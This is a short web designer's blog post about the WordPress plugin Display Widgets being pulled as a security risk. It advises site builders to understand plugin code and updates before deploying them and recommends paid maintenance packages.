Plugin Pulled Due to Security Risk
Today’s topic is for anyone in the web design/development industry, as well as for the more casual website builder. This article written earlier today is very important. It discusses a popular WordPress plugin called Display Widgets. It’s quite a lengthy read for the typical blog entry, but it is well worth the time. Please read via this link to WordFence’s blog. Then tab back here for my take on the matter.
My Thoughts Regarding Plugin Dangers
Incidents like this can seriously damage both your reputation and faith in the open source world in general. Many very useful tools exist out there but using them comes with a certain level of responsibility you must accept first. If you have used any open source plugin or tool like this one to build out client sites you owe it to yourself, and to your clients, to make sure that what you use is completely secure and that you are familiar with any behind the scenes functionality.
Whether you use WordPress, another design platform, or write custom code from scratch this still applies. I strongly recommend every person putting up a website fully understand the code you are using before you publish. Additionally, make sure you know what updates to that code are doing before installation. It is not enough to rely on positive reviews to decide what is safe to deploy on a site. Too many people use tools they don’t completely understand and are then caught off guard when something like this happens.
You should always tell clients that they are taking risks when they blindly accept updates to their site after completion. Keeping your website up to date is always good practice, but not understanding what an update does is extremely risky. This is why I recommend clients to buy a regular maintenance package and why I try to keep the price of such packages as reasonable as possible.